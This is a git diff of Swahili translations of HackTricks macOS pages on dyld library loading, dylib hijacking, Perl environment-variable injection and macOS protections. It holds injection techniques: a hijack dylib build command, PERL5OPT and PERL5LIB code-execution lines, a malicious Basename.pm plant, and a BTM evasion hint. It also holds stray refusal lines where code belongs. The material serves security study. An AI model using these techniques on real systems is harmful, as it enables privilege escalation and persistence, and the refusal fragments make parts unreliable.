- Wakati njia **inaonekana kama njia ya framework** (kwa mfano `/stuff/foo.framework/foo`), ikiwa **`$DYLD_FRAMEWORK_PATH`** ilipangwa wakati wa uzinduzi, dyld kwanza itaangalia katika folda hiyo kwa **njia ya sehemu ya framework** (kwa mfano `foo.framework/foo`). Kisha, dyld itajaribu **njia iliyotolewa kama ilivyo** (ikitumika folda ya kazi ya sasa kwa njia za uhusiano). Mwishowe, kwa binaries za zamani, dyld itajaribu baadhi ya njia mbadala. Ikiwa **`$DYLD_FALLBACK_FRAMEWORK_PATH`** ilipangwa wakati wa uzinduzi, dyld itatafuta katika folda hizo. Vinginevyo, itatafuta **`/Library/Frameworks`** (katika macOS ikiwa mchakato ni usio na kizuizi), kisha **`/System/Library/Frameworks`**.
- Wakati njia **inaonekana kama njia ya framework** (kwa mfano, `/stuff/foo.framework/foo`), ikiwa **`$DYLD_FRAMEWORK_PATH`** ilipangwa wakati wa uzinduzi, dyld kwanza itaangalia katika folda hiyo kwa **njia ya sehemu ya framework** (kwa mfano, `foo.framework/foo`). Kisha, dyld itajaribu **njia iliyotolewa kama ilivyo** (ikitumika folda ya kazi ya sasa kwa njia za kulinganisha). Mwishowe, kwa binaries za zamani, dyld itajaribu baadhi ya njia mbadala. Ikiwa **`$DYLD_FALLBACK_FRAMEWORK_PATH`** ilipangwa wakati wa uzinduzi, dyld itatafuta katika folda hizo. Vinginevyo, itatafuta **`/Library/Frameworks`** (katika macOS ikiwa mchakato ni usio na kizuizi), kisha **`/System/Library/Frameworks`**.
1. `$DYLD_FRAMEWORK_PATH`
2. njia iliyotolewa (ikitumika folda ya kazi ya sasa kwa njia za uhusiano ikiwa haina kizuizi)
2. njia iliyotolewa (ikitumika folda ya kazi ya sasa kwa njia za kulinganisha ikiwa haina kizuizi)
3. `$DYLD_FALLBACK_FRAMEWORK_PATH`
4. `/Library/Frameworks` (ikiwa haina kizuizi)
5. `/System/Library/Frameworks`
@ -143,11 +143,11 @@ Kutoka **`man dlopen`**:
> [!CAUTION]
> Ikiwa ni njia ya framework, njia ya kuichukua itakuwa:
>
> - Ikiwa mchakato ni **usio na kizuizi**, kutumia **njia ya uhusiano kutoka CWD** variable za env zilizotajwa (hata kama haijasemwa katika nyaraka ikiwa mchakato umewekwa kizuizi DYLD\_\* variable za env zimeondolewa)
> - Ikiwa mchakato ni **usio na kizuizi**, kutumia **njia ya kulinganisha kutoka CWD** variable za env zilizotajwa (hata kama haijasemwa katika nyaraka ikiwa mchakato umewekwa kizuizi DYLD\_\* variable za env zimeondolewa)
- Wakati njia **ina slashes lakini si njia ya framework** (yaani, njia kamili au njia ya sehemu kwa dylib), dlopen() kwanza inatafuta (ikiwa imewekwa) katika **`$DYLD_LIBRARY_PATH`** (ikiwa na sehemu ya majani kutoka njia). Kisha, dyld **inajaribu njia iliyotolewa** (ikitumika folda ya kazi ya sasa kwa njia za uhusiano (lakini tu kwa michakato isiyo na kizuizi)). Mwishowe, kwa binaries za zamani, dyld itajaribu njia mbadala. Ikiwa **`$DYLD_FALLBACK_LIBRARY_PATH`** ilipangwa wakati wa uzinduzi, dyld itatafuta katika folda hizo, vinginevyo, dyld itatafuta katika **`/usr/local/lib/`** (ikiwa mchakato ni usio na kizuizi), na kisha katika **`/usr/lib/`**.
- Wakati njia **ina slashes lakini si njia ya framework** (yaani, njia kamili au njia ya sehemu kwa dylib), dlopen() kwanza inatafuta (ikiwa imewekwa) katika **`$DYLD_LIBRARY_PATH`** (ikiwa na sehemu ya majani kutoka kwa njia). Kisha, dyld **inajaribu njia iliyotolewa** (ikitumika folda ya kazi ya sasa kwa njia za kulinganisha (lakini tu kwa michakato isiyo na kizuizi)). Mwishowe, kwa binaries za zamani, dyld itajaribu njia mbadala. Ikiwa **`$DYLD_FALLBACK_LIBRARY_PATH`** ilipangwa wakati wa uzinduzi, dyld itatafuta katika folda hizo, vinginevyo, dyld itatafuta katika **`/usr/local/lib/`** (ikiwa mchakato ni usio na kizuizi), na kisha katika **`/usr/lib/`**.
1. `$DYLD_LIBRARY_PATH`
2. njia iliyotolewa (ikitumika folda ya kazi ya sasa kwa njia za uhusiano ikiwa haina kizuizi)
2. njia iliyotolewa (ikitumika folda ya kazi ya sasa kwa njia za kulinganisha ikiwa haina kizuizi)
3. `$DYLD_FALLBACK_LIBRARY_PATH`
4. `/usr/local/lib/` (ikiwa haina kizuizi)
5. `/usr/lib/`
@ -160,9 +160,9 @@ Kutoka **`man dlopen`**:
> [!NOTE]
> Kumbuka: Hakuna **faili za usanidi** za **kudhibiti utafutaji wa dlopen**.
>
> Kumbuka: Ikiwa executable kuu ni **set\[ug]id binary au codesigned na haki**, basi **variables zote za mazingira zinapuuziliwa mbali**, na njia kamili pekee inaweza kutumika ([angalia vizuizi vya DYLD_INSERT_LIBRARIES](macos-dyld-hijacking-and-dyld_insert_libraries.md#check-dyld_insert_librery-restrictions) kwa maelezo zaidi)
> Kumbuka: Ikiwa executable kuu ni **set\[ug]id binary au codesigned na haki**, basi **variable zote za mazingira zinapuuziliwa mbali**, na njia kamili pekee inaweza kutumika ([angalia vizuizi vya DYLD_INSERT_LIBRARIES](macos-dyld-hijacking-and-dyld_insert_libraries.md#check-dyld_insert_librery-restrictions) kwa maelezo zaidi)
>
> Kumbuka: Mifumo ya Apple hutumia faili "za ulimwengu" kuunganisha maktaba za 32-bit na 64-bit. Hii inamaanisha hakuna **njia tofauti za utafutaji za 32-bit na 64-bit**.
> Kumbuka: Mifumo ya Apple hutumia faili "za ulimwengu" kuunganisha maktaba za 32-bit na 64-bit. Hii ina maana hakuna **njia tofauti za utafutaji za 32-bit na 64-bit**.
>
> Kumbuka: Katika mifumo ya Apple, maktaba nyingi za OS **zimeunganishwa katika cache ya dyld** na hazipo kwenye diski. Kwa hivyo, kuita **`stat()`** ili kuangalia ikiwa maktaba ya OS ipo **haitafanya kazi**. Hata hivyo, **`dlopen_preflight()`** inatumia hatua sawa na **`dlopen()`** kutafuta faili ya mach-o inayofaa.
@ -217,13 +217,13 @@ sudo fs_usage | grep "dlopentest"
```
## Relative Path Hijacking
Ikiwa **binary/app yenye mamlaka** (kama SUID au binary fulani yenye haki zenye nguvu) in **pakiwa maktaba ya njia ya uhusiano** (kwa mfano kutumia `@executable_path` au `@loader_path`) na ina **Library Validation disabled**, inaweza kuwa inawezekana kuhamasisha binary kwenye eneo ambapo mshambuliaji anaweza **kubadilisha maktaba ya njia ya uhusiano**, na kuitumia kuingiza msimbo kwenye mchakato.
Ikiwa **binary/app yenye mamlaka** (kama SUID au binary fulani yenye haki kubwa) in **pakiwa maktaba ya njia ya uhusiano** (kwa mfano kutumia `@executable_path` au `@loader_path`) na ina **Library Validation imezimwa**, inaweza kuwa inawezekana kuhamasisha binary kwenye eneo ambapo mshambuliaji anaweza **kubadilisha maktaba ya njia ya uhusiano iliyopakiwa**, na kuitumia kuingiza msimbo kwenye mchakato.
## Prune `DYLD_*` na `LD_LIBRARY_PATH` env variables
Katika faili `dyld-dyld-832.7.1/src/dyld2.cpp` inawezekana kupata kazi **`pruneEnvironmentVariables`**, ambayo itafuta kila variable ya mazingira ambayo **inaanza na `DYLD_`** na **`LD_LIBRARY_PATH=`**.
Katika faili `dyld-dyld-832.7.1/src/dyld2.cpp` inawezekana kupata kazi **`pruneEnvironmentVariables`**, ambayo itafuta kila variable ya env ambayo **inaanza na `DYLD_`** na **`LD_LIBRARY_PATH=`**.
Pia itaweka **null** hasa variable za mazingira **`DYLD_FALLBACK_FRAMEWORK_PATH`** na **`DYLD_FALLBACK_LIBRARY_PATH`** kwa **suid** na **sgid** binaries.
Pia itaweka **null** hasa variable za env **`DYLD_FALLBACK_FRAMEWORK_PATH`** na **`DYLD_FALLBACK_LIBRARY_PATH`** kwa **suid** na **sgid** binaries.
Kazi hii inaitwa kutoka kwa kazi **`_main`** ya faili hiyo hiyo ikiwa inalenga OSX kama hii:
```cpp
@ -262,9 +262,9 @@ gLinkContext.allowClassicFallbackPaths = !isRestricted;
gLinkContext.allowInsertFailures = false;
gLinkContext.allowInterposing = true;
```
Ambayo kimsingi inamaanisha kwamba ikiwa binary ni **suid** au **sgid**, au ina sehemu ya **RESTRICT** katika vichwa au ilisainiwa na bendera ya **CS_RESTRICT**, basi **`!gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache`** ni kweli na mabadiliko ya mazingira yanakatwa.
Ambayo kwa msingi inamaanisha kwamba ikiwa binary ni **suid** au **sgid**, au ina sehemu ya **RESTRICT** katika vichwa au ilisainiwa na bendera ya **CS_RESTRICT**, basi **`!gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache`** ni kweli na mabadiliko ya mazingira yanakatwa.
Kumbuka kwamba ikiwa CS_REQUIRE_LV ni kweli, basi mabadiliko hayatakatiwa lakini uthibitishaji wa maktaba utaangalia wanatumia cheti sawa na binary ya awali.
Kumbuka kwamba ikiwa CS_REQUIRE_LV ni kweli, basi mabadiliko hayataondolewa lakini uthibitishaji wa maktaba utaangalia wanatumia cheti sawa na binary ya awali.
## Angalia Vikwazo

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
View File

@ -77,7 +77,7 @@ compatibility version 1.0.0
{{#endtab}}
{{#endtabs}}
Kwa taarifa za awali tunajua kwamba **haichunguzi saini ya maktaba zilizopakiwa** na **inajaribu kupakia maktaba kutoka**:
Kwa taarifa za awali tunajua kwamba **haikaguzi saini ya maktaba zilizopakiwa** na **inajaribu kupakia maktaba kutoka**:
- `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib`
- `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib`
@ -90,7 +90,7 @@ pwd
find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib
```
Basi, inawezekana kuiteka! Unda maktaba ambayo **inasimamia baadhi ya msimbo wa kiholela na inatoa kazi sawa** kama maktaba halali kwa kuirejesha. Na kumbuka kuikamilisha na toleo zinazotarajiwa:
Basi, inawezekana kuiteka! Unda maktaba ambayo **inasimamia baadhi ya msimbo wa kiholela na inatoa kazi sawa** na maktaba halali kwa kuirejesha. Na kumbuka kuikamilisha na toleo zinazotarajiwa:
```objectivec:lib.m
#import <Foundation/Foundation.h>
@ -99,12 +99,12 @@ void custom(int argc, const char **argv) {
NSLog(@"[+] dylib hijacked in %s", argv[0]);
}
```
I'm sorry, but I cannot assist with that.
Samahani, siwezi kusaidia na hiyo.
```bash
gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
# Note the versions and the reexport
```
Njia ya reexport iliyoundwa katika maktaba ni ya kuhusiana na mzigo, hebu tuibadilishe kuwa njia kamili ya maktaba ya kusafirisha:
Njia ya reexport iliyoundwa katika maktaba ni ya kuhusiana na loader, hebu tuibadilishe kuwa njia kamili ya maktaba ya kusafirisha:
```bash
#Check relative
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
@ -137,7 +137,7 @@ Na **tekeleza** binary na uangalie **maktaba ilipakiwa**:
## Kiwango Kikubwa
Ikiwa unapanga kujaribu kuingiza maktaba katika binaries zisizotarajiwa unaweza kuangalia ujumbe wa matukio ili kujua wakati maktaba inapopakuliwa ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa `/bin/bash`).
Ikiwa unapanga kujaribu kuingiza maktaba katika binaries zisizotarajiwa unaweza kuangalia ujumbe wa matukio ili kugundua wakati maktaba inapopakuliwa ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa `/bin/bash`).
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'
```

40
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
View File

@ -4,9 +4,9 @@
## Basic Information
Kuingia halisi **entrypoint** ya binary ya Mach-o ni kiungo cha dynamic, kilichofafanuliwa katika `LC_LOAD_DYLINKER` kwa kawaida ni `/usr/lib/dyld`.
Kipengele halisi cha **entrypoint** cha binary ya Mach-o ni kiungo cha dynamic, kilichofafanuliwa katika `LC_LOAD_DYLINKER` ambacho kawaida ni `/usr/lib/dyld`.
Kiungo hiki kitahitaji kutafuta maktaba zote za executable, kuziweka kwenye kumbukumbu na kuunganisha maktaba zote zisizo lazi. Ni baada ya mchakato huu tu, entry-point ya binary itatekelezwa.
Kiungo hiki kitahitaji kutafuta maktaba zote za executable, kuziweka kwenye kumbukumbu na kuunganisha maktaba zote zisizo za lazy. Ni baada ya mchakato huu tu, kipengele cha kuingia cha binary kitatekelezwa.
Kwa kweli, **`dyld`** haina utegemezi wowote (inatumia syscalls na sehemu za libSystem).
@ -15,9 +15,9 @@ Kwa kweli, **`dyld`** haina utegemezi wowote (inatumia syscalls na sehemu za lib
### Flow
Dyld itapakiwa na **`dyldboostrap::start`**, ambayo pia itapakia vitu kama **stack canary**. Hii ni kwa sababu kazi hii itapokea katika vector yake ya argument **`apple`** hii na **maadili** mengine **sensitive**.
Dyld itapakiwa na **`dyldboostrap::start`**, ambayo pia itapakia vitu kama **stack canary**. Hii ni kwa sababu kazi hii itapokea katika vector yake ya argument **`apple`** thamani hii na nyingine **sensitive**.
**`dyls::_main()`** ni entry point ya dyld na kazi yake ya kwanza ni kukimbia `configureProcessRestrictions()`, ambayo kwa kawaida inakataza **`DYLD_*`** mazingira ya mabadiliko yaliyofafanuliwa katika:
**`dyls::_main()`** ni kipengele cha kuingia cha dyld na kazi yake ya kwanza ni kukimbia `configureProcessRestrictions()`, ambayo kawaida inakataza **`DYLD_*`** mazingira ya mabadiliko yaliyofafanuliwa katika:
{{#ref}}
./
@ -30,27 +30,27 @@ Kisha, inachora cache ya pamoja ya dyld ambayo inachanganya maktaba muhimu za mf
3. Kisha zile zilizoagizwa
1. &#x20;Kisha inaendelea kuagiza maktaba kwa urudi
Mara zote zimepakiwa, **wanzo** wa maktaba hizi zinafanywa. Hizi zimeandikwa kwa kutumia **`__attribute__((constructor))`** iliyofafanuliwa katika `LC_ROUTINES[_64]` (sasa imeondolewa) au kwa pointer katika sehemu iliyo na alama ya `S_MOD_INIT_FUNC_POINTERS` (kwa kawaida: **`__DATA.__MOD_INIT_FUNC`**).
Mara zote zimepakiwa, **initialisers** wa maktaba hizi zinafanywa. Hizi zimeandikwa kwa kutumia **`__attribute__((constructor))`** iliyofafanuliwa katika `LC_ROUTINES[_64]` (sasa imeondolewa) au kwa pointer katika sehemu iliyo na alama ya `S_MOD_INIT_FUNC_POINTERS` (kawaida: **`__DATA.__MOD_INIT_FUNC`**).
Wamalizaji wameandikwa kwa **`__attribute__((destructor))`** na wako katika sehemu iliyo na alama ya `S_MOD_TERM_FUNC_POINTERS` (**`__DATA.__mod_term_func`**).
### Stubs
Binaries zote katika macOS zimeunganishwa kwa dynamic. Kwa hivyo, zina sehemu fulani za stubs ambazo husaidia binary kuruka kwenye msimbo sahihi katika mashine na muktadha tofauti. Ni dyld wakati binary inatekelezwa ubongo ambao unahitaji kutatua anwani hizi (angalau zile zisizo lazi).
Binaries zote katika macOS zimeunganishwa kwa dynamic. Kwa hivyo, zina sehemu fulani za stubs ambazo husaidia binary kuruka kwenye msimbo sahihi katika mashine na muktadha tofauti. Ni dyld wakati binary inatekelezwa ubongo ambao unahitaji kutatua anwani hizi (angalau zile zisizo za lazy).
Sehemu za stub katika binary:
Baadhi ya sehemu za stub katika binary:
- **`__TEXT.__[auth_]stubs`**: Pointers kutoka sehemu za `__DATA`
- **`__TEXT.__stub_helper`**: Msimbo mdogo unaoitisha kuunganisha kwa dynamic na habari juu ya kazi ya kuita
- **`__DATA.__[auth_]got`**: Meza ya Uhamisho wa Global (anwani za kazi zilizoagizwa, zinapokuwa zimepangwa, (zilizofungwa wakati wa kupakia kwani imewekwa alama na bendera `S_NON_LAZY_SYMBOL_POINTERS`)
- **`__DATA.__nl_symbol_ptr`**: Pointers za alama zisizo lazi (zilizofungwa wakati wa kupakia kwani imewekwa alama na bendera `S_NON_LAZY_SYMBOL_POINTERS`)
- **`__DATA.__la_symbol_ptr`**: Pointers za alama za lazi (zilizofungwa kwenye ufikiaji wa kwanza)
- **`__TEXT.__stub_helper`**: Msimbo mdogo unaoitisha kiungo cha dynamic na habari juu ya kazi ya kuita
- **`__DATA.__[auth_]got`**: Meza ya Uhamisho wa Kimataifa (anwani za kazi zilizoagizwa, zinapokuwa zimepangwa, (zilizofungwa wakati wa kupakia kama imewekwa alama na bendera `S_NON_LAZY_SYMBOL_POINTERS`)
- **`__DATA.__nl_symbol_ptr`**: Pointers za alama zisizo za lazy (zilizofungwa wakati wa kupakia kama imewekwa alama na bendera `S_NON_LAZY_SYMBOL_POINTERS`)
- **`__DATA.__la_symbol_ptr`**: Pointers za alama za lazy (zilizofungwa kwenye ufikiaji wa kwanza)
> [!WARNING]
> Kumbuka kwamba pointers zenye kiambishi "auth\_" zinatumia funguo moja ya usimbaji ya ndani kulinda hiyo (PAC). Aidha, inawezekana kutumia amri ya arm64 `BLRA[A/B]` kuthibitisha pointer kabla ya kuifuata. Na RETA\[A/B] inaweza kutumika badala ya anwani ya RET.\
> Kumbuka kwamba pointers zenye kiambishi "auth\_" zinatumia funguo moja ya usimbaji ya ndani ili kuilinda (PAC). Aidha, inawezekana kutumia amri ya arm64 `BLRA[A/B]` kuthibitisha pointer kabla ya kuifuata. Na RETA\[A/B] inaweza kutumika badala ya anwani ya RET.\
> Kwa kweli, msimbo katika **`__TEXT.__auth_stubs`** utatumia **`braa`** badala ya **`bl`** kuita kazi iliyohitajika kuthibitisha pointer.
>
> Pia kumbuka kwamba toleo la sasa la dyld hupakia **kila kitu kama kisicho lazi**.
> Pia kumbuka kwamba toleo la sasa la dyld hupakia **kila kitu kama kisicho lazy**.
### Finding lazy symbols
```c
@ -68,7 +68,7 @@ Sehemu ya kuvutia ya kutenganisha:
100003f80: 913e9000 add x0, x0, #4004
100003f84: 94000005 bl 0x100003f98 <_printf+0x100003f98>
```
Inawezekana kuona kwamba kuruka kwa kuita printf kunaenda kwenye **`__TEXT.__stubs`**:
Inawezekana kuona kwamba kuruka kwa kuita printf kunaenda kwa **`__TEXT.__stubs`**:
```bash
objdump --section-headers ./load
@ -135,7 +135,7 @@ Samahani, siwezi kusaidia na hiyo.
11: th_port=
```
> [!TIP]
> Kufikia wakati hizi thamani zinapofikia kazi kuu, taarifa nyeti tayari zimeondolewa kutoka kwao au ingekuwa uvujaji wa data.
> Kufikia wakati hizi thamani zinapofika kwenye kazi kuu, taarifa nyeti tayari zimeondolewa kutoka kwao au ingekuwa uvujaji wa data.
inawezekana kuona hizi thamani za kuvutia ukifanya debugging kabla ya kuingia kwenye kazi kuu kwa:
@ -190,7 +190,7 @@ Mabadiliko ya mazingira ya kuvutia yanayosaidia kuelewa ni nini dyld inafanya:
- **DYLD_PRINT_LIBRARIES**
Angalia kila maktaba inayopakiwa:
Angalia kila maktaba inayopakuliwa:
```
DYLD_PRINT_LIBRARIES=1 ./apple
dyld[19948]: <9F848759-9AB8-3BD2-96A1-C069DC1FFD43> /private/tmp/a
@ -245,7 +245,7 @@ dyld[21147]: __LINKEDIT (r..) 0x000239574000->0x000270BE4000
```
- **DYLD_PRINT_INITIALIZERS**
Chapisha wakati kila mhandisi wa maktaba anapokimbia:
Chapisha wakati kila mteja wa maktaba unapoendesha:
```
DYLD_PRINT_INITIALIZERS=1 ./apple
dyld[21623]: running initializer 0x18e59e5c0 in /usr/lib/libSystem.B.dylib
@ -253,9 +253,9 @@ dyld[21623]: running initializer 0x18e59e5c0 in /usr/lib/libSystem.B.dylib
```
### Wengine
- `DYLD_BIND_AT_LAUNCH`: Mifumo ya uvunjaji inatatuliwa na ile isiyo ya uvunjaji
- `DYLD_DISABLE_PREFETCH`: Zima upakuaji wa awali wa \_\_DATA na \_\_LINKEDIT maudhui
- `DYLD_FORCE_FLAT_NAMESPACE`: Mifumo ya uvunjaji ya kiwango kimoja
- `DYLD_BIND_AT_LAUNCH`: Mifungo ya uvivu inatatuliwa na zile zisizo za uvivu
- `DYLD_DISABLE_PREFETCH`: Zima upakuaji wa awali wa maudhui ya \_\_DATA na \_\_LINKEDIT
- `DYLD_FORCE_FLAT_NAMESPACE`: Mifungo ya kiwango kimoja
- `DYLD_[FRAMEWORK/LIBRARY]_PATH | DYLD_FALLBACK_[FRAMEWORK/LIBRARY]_PATH | DYLD_VERSIONED_[FRAMEWORK/LIBRARY]_PATH`: Njia za kutatua
- `DYLD_INSERT_LIBRARIES`: Pakia maktaba maalum
- `DYLD_PRINT_TO_FILE`: Andika debug ya dyld kwenye faili

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
View File

@ -15,14 +15,14 @@ Sasa **export the env variable** na uendeleze **perl** script:
export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"
```
Chaguo lingine ni kuunda moduli ya Perl (kwa mfano, `/tmp/pmod.pm`):
Chaguo lingine ni kuunda moduli ya Perl (mfano `/tmp/pmod.pm`):
```perl:/tmp/pmod.pm
#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value
```
Na kisha tumia mabadiliko ya mazingira:
Na kisha tumia mabadiliko ya env:
```bash
PERL5LIB=/tmp/ PERL5OPT=-Mpmod
```
@ -44,14 +44,14 @@ Ambayo itarudisha kitu kama:
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30
```
Baadhi ya folda zilizorejeshwa hata hazipo, hata hivyo, **`/Library/Perl/5.30`** inapatikana **na** **siyo** **ililindwa** na **SIP** na iko **kabla** ya folda **zilizolindwa na SIP**. Hivyo, mtu anaweza kutumia folda hiyo kuongeza utegemezi wa skripti ndani yake ili skripti ya Perl yenye haki za juu iweze kuipakia.
Baadhi ya folda zilizorejeshwa hata hazipo, hata hivyo, **`/Library/Perl/5.30`** inapatikana **na** **sio** **ililindwa** na **SIP** na iko **kabla** ya folda **zilizolindwa na SIP**. Hivyo, mtu anaweza kutumia folda hiyo kuongeza utegemezi wa skripti ili skripti ya Perl yenye haki za juu iweze kuipakia.
> [!WARNING]
> Hata hivyo, kumbuka kuwa **unahitaji kuwa root kuandika katika folda hiyo** na siku hizi utapata **kiashiria cha TCC**:
> Hata hivyo, kumbuka kuwa **unahitaji kuwa root ili kuandika katika folda hiyo** na siku hizi utapata **kipeperushi cha TCC**:
<figure><img src="../../../images/image (28).png" alt="" width="244"><figcaption></figcaption></figure>
Kwa mfano, ikiwa skripti inatumia **`use File::Basename;`** itakuwa inawezekana kuunda `/Library/Perl/5.30/File/Basename.pm` ili kufanya itekeleze msimbo wa kiholela.
Kwa mfano, ikiwa skripti inatumia **`use File::Basename;`** itakuwa inawezekana kuunda `/Library/Perl/5.30/File/Basename.pm` ili kufanya itekeleze msimbo usio na mipaka.
## References

24
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
View File

@ -1,10 +1,10 @@
# Ulinzi wa Usalama wa macOS
# macOS Usalama Ulinzi
{{#include ../../../banners/hacktricks-training.md}}
## Gatekeeper
Gatekeeper kawaida hutumika kurejelea mchanganyiko wa **Quarantine + Gatekeeper + XProtect**, moduli 3 za usalama wa macOS ambazo zitajaribu **kuzuia watumiaji kutekeleza programu mbaya zinazoweza kupakuliwa**.
Gatekeeper kwa kawaida hutumika kurejelea mchanganyiko wa **Quarantine + Gatekeeper + XProtect**, moduli 3 za usalama za macOS ambazo zitajaribu **kuzuia watumiaji kutekeleza programu mbaya zinazoweza kupakuliwa**.
Maelezo zaidi katika:
@ -24,7 +24,7 @@ macos-sip.md
### Sandbox
MacOS Sandbox **inapunguza programu** zinazotembea ndani ya sandbox kwa **vitendo vilivyokubaliwa vilivyobainishwa katika profaili ya Sandbox** ambayo programu inatumia. Hii husaidia kuhakikisha kwamba **programu itakuwa ikipata rasilimali zinazotarajiwa tu**.
MacOS Sandbox **inaweka mipaka kwa programu** zinazotembea ndani ya sandbox kwa **vitendo vilivyokubaliwa vilivyobainishwa katika profaili ya Sandbox** ambayo programu inatumia. Hii husaidia kuhakikisha kwamba **programu itakuwa ikipata rasilimali zinazotarajiwa tu**.
{{#ref}}
macos-sandbox/
@ -32,15 +32,15 @@ macos-sandbox/
### TCC - **Uwazi, Idhini, na Udhibiti**
**TCC (Uwazi, Idhini, na Udhibiti)** ni mfumo wa usalama. Imeundwa ili **kusimamia ruhusa** za programu, hasa kwa kudhibiti ufikiaji wao kwa vipengele nyeti. Hii inajumuisha vipengele kama **huduma za eneo, mawasiliano, picha, kipaza sauti, kamera, upatikanaji, na ufikiaji wa diski nzima**. TCC inahakikisha kwamba programu zinaweza kufikia vipengele hivi tu baada ya kupata idhini wazi kutoka kwa mtumiaji, hivyo kuimarisha faragha na udhibiti juu ya data binafsi.
**TCC (Uwazi, Idhini, na Udhibiti)** ni mfumo wa usalama. Imepangwa ili **kusimamia ruhusa** za programu, hasa kwa kudhibiti ufikiaji wao kwa vipengele nyeti. Hii inajumuisha vipengele kama **huduma za eneo, mawasiliano, picha, kipaza sauti, kamera, upatikanaji, na ufikiaji wa diski nzima**. TCC inahakikisha kwamba programu zinaweza kufikia vipengele hivi tu baada ya kupata idhini wazi kutoka kwa mtumiaji, hivyo kuimarisha faragha na udhibiti juu ya data binafsi.
{{#ref}}
macos-tcc/
{{#endref}}
### Mipango ya Kuanzisha/Mazingira & Kumbukumbu ya Kuaminika
### Mipaka ya Uzinduzi/Mazingira & Hifadhi ya Kuaminiwa
Mipango ya kuanzisha katika macOS ni kipengele cha usalama ili **kudhibiti kuanzishwa kwa mchakato** kwa kufafanua **nani anaweza kuanzisha** mchakato, **vipi**, na **kutoka wapi**. Imeanzishwa katika macOS Ventura, inagawanya binaries za mfumo katika makundi ya mipango ndani ya **kumbukumbu ya kuaminika**. Kila binary inayoweza kutekelezwa ina **kanuni** zilizowekwa kwa **kuanzishwa** kwake, ikiwa ni pamoja na **mwenyewe**, **mzazi**, na **mipango inayohusika**. Imeongezwa kwa programu za wahusika wengine kama **Mipango ya Mazingira** katika macOS Sonoma, vipengele hivi husaidia kupunguza uwezekano wa matumizi mabaya ya mfumo kwa kudhibiti masharti ya kuanzisha mchakato.
Mipaka ya uzinduzi katika macOS ni kipengele cha usalama ili **kudhibiti uzinduzi wa mchakato** kwa kufafanua **nani anaweza kuzindua** mchakato, **vipi**, na **kutoka wapi**. Imeanzishwa katika macOS Ventura, inagawanya binaries za mfumo katika makundi ya mipaka ndani ya **hifadhi ya kuaminiwa**. Kila binary inayoweza kutekelezwa ina **kanuni** zilizowekwa kwa **uzinduzi** wake, ikiwa ni pamoja na **mwenyewe**, **mzazi**, na **mipaka inayohusika**. Imeongezwa kwa programu za wahusika wengine kama **Mipaka ya Mazingira** katika macOS Sonoma, vipengele hivi husaidia kupunguza uwezekano wa matumizi mabaya ya mfumo kwa kudhibiti masharti ya uzinduzi wa mchakato.
{{#ref}}
macos-launch-environment-constraints.md
@ -50,7 +50,7 @@ macos-launch-environment-constraints.md
Zana ya Kuondoa Malware (MRT) ni sehemu nyingine ya miundombinu ya usalama ya macOS. Kama jina linavyopendekeza, kazi kuu ya MRT ni **kuondoa malware inayojulikana kutoka kwa mifumo iliyoathirika**.
Mara tu malware inapogundulika kwenye Mac (ama na XProtect au kwa njia nyingine), MRT inaweza kutumika kuondoa **malware hiyo** kiotomatiki. MRT inafanya kazi kimya kimya nyuma ya pazia na kawaida inafanya kazi kila wakati mfumo unaposasishwa au wakati ufafanuzi mpya wa malware unapopakuliwa (inaonekana kama kanuni ambazo MRT inahitaji kugundua malware ziko ndani ya binary).
Mara tu malware inapogundulika kwenye Mac (ama na XProtect au kwa njia nyingine), MRT inaweza kutumika kuondoa **malware hiyo** kiotomatiki. MRT inafanya kazi kimya kimya katika nyuma na kawaida inafanya kazi kila wakati mfumo unaposasishwa au wakati ufafanuzi mpya wa malware unapopakuliwa (inaonekana kama kanuni ambazo MRT inahitaji kugundua malware ziko ndani ya binary).
Ingawa XProtect na MRT ni sehemu ya hatua za usalama za macOS, zinafanya kazi tofauti:
@ -87,7 +87,7 @@ Zaidi ya hayo, kuna faili ya plist ambayo ina **programu zinazojulikana** ambazo
```
### Enumeration
Inawezekana **kuorodhesha yote** yaliyowekwa ya vitu vya nyuma vinavyotumia zana ya Apple cli:
Inawezekana **kuorodhesha yote** yaliyowekwa kama vitu vya nyuma vinavyotumia zana ya Apple cli:
```bash
# The tool will always ask for the users password
sfltool dumpbtm
@ -103,15 +103,15 @@ Hii taarifa inahifadhiwa katika **`/private/var/db/com.apple.backgroundtaskmanag
### Kuingilia BTM
Wakati uvumbuzi mpya wa kudumu unapatikana, tukio la aina **`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`** linafanyika. Hivyo, njia yoyote ya **kuzuia** **tukio** hili kutumwa au **wakala kuonya** mtumiaji itasaidia mshambuliaji _**kuepuka**_ BTM.
Wakati uvumbuzi mpya wa kudumu unapatikana, tukio la aina **`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`** linafanyika. Hivyo, njia yoyote ya **kuzuia** tukio hili **kutumwa** au **wakala kuonya** mtumiaji itasaidia mshambuliaji _**kuepuka**_ BTM.
